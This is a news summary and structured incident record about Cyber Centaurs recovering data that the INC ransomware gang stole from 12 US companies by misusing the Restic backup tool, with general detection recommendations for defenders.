Ransomware Gang’s Operational Slip-Up Enables Data Recovery for 12 US Firms
Researchers at Florida-based cybersecurity firm Cyber Centaurs successfully recovered stolen data from 12 U.S. companies targeted by the INC ransomware group after uncovering a critical lapse in the gang’s operational security. The discovery stemmed from the group’s reliance on Restic, a legitimate open-source backup tool repurposed to encrypt and exfiltrate victim data to attacker-controlled cloud storage.
By analyzing artifacts left behind by the gang including renamed Restic binaries (e.g., winupdate.exe), PowerShell scripts, and configuration variables Cyber Centaurs developed a custom enumeration script to identify S3-style cloud repositories tied to the group’s infrastructure. Using the attackers’ own tooling and encryption semantics, investigators safely listed snapshots without altering the repositories, confirming the presence of stolen datasets from multiple victims.
The INC gang, active since July 2023, typically employs spear-phishing to compromise credentials and adapts its exfiltration tactics based on network complexity. In smaller environments, it relies on Restic; in larger ones, it hijacks existing backup systems like Veeam. The recovered data, though encrypted, was decrypted using Restic’s native functionality, as the tool itself was the encryption mechanism. Law enforcement was subsequently engaged to validate the data’s origins.
Key findings from the investigation include:
- Infrastructure Reuse: The gang repurposes cloud storage across multiple victims, treating ransomware as a scalable business model rather than isolated attacks.
- Detection Opportunities: Restic executions outside expected backup contexts particularly from system directories or user-writable locations can signal compromise.
- Operational Patterns: Attackers often rename binaries and leverage legitimate execution paths to evade detection.
While Cyber Centaurs’ managing principal acknowledged the recovery was a temporary setback for the gang (which can easily spin up new infrastructure), the case highlights how defenders can exploit attacker missteps. The firm’s report also provided indicators of compromise, including the use of AnyDesk for remote access, and emphasized the need to monitor for unexpected encrypted data transfers to unfamiliar IP addresses.
The INC group has previously exploited vulnerabilities in Citrix Netscaler ADC/Gateway and deployed a Linux variant of its ransomware. This incident underscores the broader trend of ransomware gangs weaponizing legitimate tools to evade detection and maintain persistence.
Cyber Centaurs cybersecurity rating report: https://www.rankiteo.com/company/cyber-centaurs
"id": "CYB1769138524",
"linkid": "cyber-centaurs",
"type": "Ransomware",
"date": "7/2023",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"{'affected_entities': [{'location': 'United States', 'type': 'Company'}],
'attack_vector': 'Spear-phishing, Exploitation of vulnerabilities (Citrix '
'Netscaler ADC/Gateway)',
'data_breach': {'data_encryption': True, 'data_exfiltration': True},
'description': 'Researchers at Florida-based cybersecurity firm Cyber '
'Centaurs successfully recovered stolen data from 12 U.S. '
'companies targeted by the INC ransomware group after '
'uncovering a critical lapse in the gang’s operational '
'security. The discovery stemmed from the group’s reliance on '
'Restic, a legitimate open-source backup tool repurposed to '
'encrypt and exfiltrate victim data to attacker-controlled '
'cloud storage. The recovered data was decrypted using '
'Restic’s native functionality, and law enforcement was '
'engaged to validate the data’s origins.',
'impact': {'data_compromised': True},
'initial_access_broker': {'entry_point': 'Spear-phishing, Citrix Netscaler '
'ADC/Gateway vulnerabilities'},
'investigation_status': 'Completed (data recovery achieved)',
'lessons_learned': 'Attackers reuse infrastructure across victims, repurpose '
'legitimate tools (e.g., Restic, AnyDesk) to evade '
'detection, and leave artifacts (e.g., renamed binaries, '
'PowerShell scripts) that can be exploited by defenders. '
'Monitoring for unexpected encrypted data transfers and '
'tool executions outside expected contexts can aid '
'detection.',
'motivation': 'Financial gain',
'post_incident_analysis': {'corrective_actions': 'Enhanced monitoring for '
'tool misuse, detection of '
'unexpected encrypted data '
'transfers, law enforcement '
'engagement for data '
'validation',
'root_causes': 'Operational security lapse (reuse '
'of Restic for '
'encryption/exfiltration, artifacts '
'left behind), reliance on '
'legitimate tools to evade '
'detection'},
'ransomware': {'data_encryption': True,
'data_exfiltration': True,
'ransomware_strain': 'INC ransomware'},
'recommendations': ['Monitor for Restic executions outside expected backup '
'contexts, particularly from system directories or '
'user-writable locations.',
'Detect unexpected encrypted data transfers to unfamiliar '
'IP addresses.',
'Track renamed binaries and legitimate tools (e.g., '
'AnyDesk) used for malicious purposes.'],
'references': [{'source': 'Cyber Centaurs report'}],
'response': {'enhanced_monitoring': 'Monitoring for Restic executions outside '
'expected backup contexts',
'law_enforcement_notified': True,
'recovery_measures': 'Data recovery from attacker-controlled '
'cloud storage',
'remediation_measures': 'Data recovery via Restic decryption, '
'monitoring for unexpected encrypted '
'data transfers',
'third_party_assistance': 'Cyber Centaurs'},
'threat_actor': 'INC ransomware group',
'title': 'Ransomware Gang’s Operational Slip-Up Enables Data Recovery for 12 '
'US Firms',
'type': 'Ransomware',
'vulnerability_exploited': 'Citrix Netscaler ADC/Gateway vulnerabilities'}